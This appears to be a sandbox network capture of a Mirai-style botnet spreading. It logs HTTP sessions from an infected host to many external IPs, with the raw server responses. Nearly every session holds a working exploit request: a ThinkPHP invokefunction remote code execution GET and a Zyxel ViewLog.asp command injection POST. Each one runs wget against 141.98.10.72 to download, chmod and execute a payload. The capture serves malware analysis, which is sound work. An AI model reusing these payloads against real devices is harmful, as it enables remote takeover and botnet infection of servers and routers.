                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:29:46 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:46 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 63 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 38 36 26 23 34 36 3b 38 35 39 66 64 63 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5cf90a17&#46;1707899386&#46;859fdc6</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            806192.168.2.233397095.163.56.16980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:46.127571106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:46.355767012 CET387INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            X-XSS-Protection: 0
                                                            X-Host: apif22.i.mail.ru
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            807192.168.2.234618831.200.86.38080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:46.206455946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            808192.168.2.233366695.86.100.918080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:46.212349892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            809192.168.2.235166095.58.73.8180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:46.404944897 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:46.709279060 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:29:46.709930897 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            810192.168.2.233827031.136.16.2108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:47.934509039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.564208031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:49.812077045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:52.307645082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:57.427051067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.409508944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:27.630673885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:08.585073948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            811192.168.2.235078431.200.0.2088080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:47.980554104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            812192.168.2.236060494.122.1.1648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:47.980694056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            813192.168.2.234641894.123.61.1518080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:47.981080055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            814192.168.2.235426295.86.116.718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:47.985667944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            815192.168.2.2351728112.104.30.15780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.045294046 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:48.375212908 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 14 Feb 2024 08:29:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            816192.168.2.2356708112.196.3.8980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.086733103 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:48.467643023 CET119INHTTP/1.0 400 Bad Request
                                                            Server: HSP-01
                                                            Date: wed, 14 feb 2024 13:50:57 GMT
                                                            Content-Length: 0
                                                            Connection: Close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            817192.168.2.233320285.158.57.128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.140611887 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.345330000 CET396INHTTP/1.0 401 Authentication Required
                                                            WWW-Authenticate: Basic realm="proxy"
                                                            Connection: close
                                                            Content-type: text/html; charset=us-ascii
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            818192.168.2.235233294.120.11.2308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.226311922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            819192.168.2.236029694.121.127.918080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.228627920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            820192.168.2.235130062.113.110.238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.395097017 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.649666071 CET207INHTTP/1.1 404 Not Found
                                                            Content-Type: text/plain; charset=utf-8
                                                            X-Content-Type-Options: nosniff
                                                            Date: Wed, 14 Feb 2024 08:29:48 GMT
                                                            Content-Length: 19
                                                            Connection: close
                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                            Data Ascii: 404 page not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            821192.168.2.2348894112.197.1.5280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.432647943 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:48.779587030 CET123INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            822192.168.2.2339116112.74.62.9280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.442241907 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:48.798635006 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.21.1
                                                            Date: Wed, 14 Feb 2024 08:29:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            823192.168.2.233459094.183.138.1928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:48.477551937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
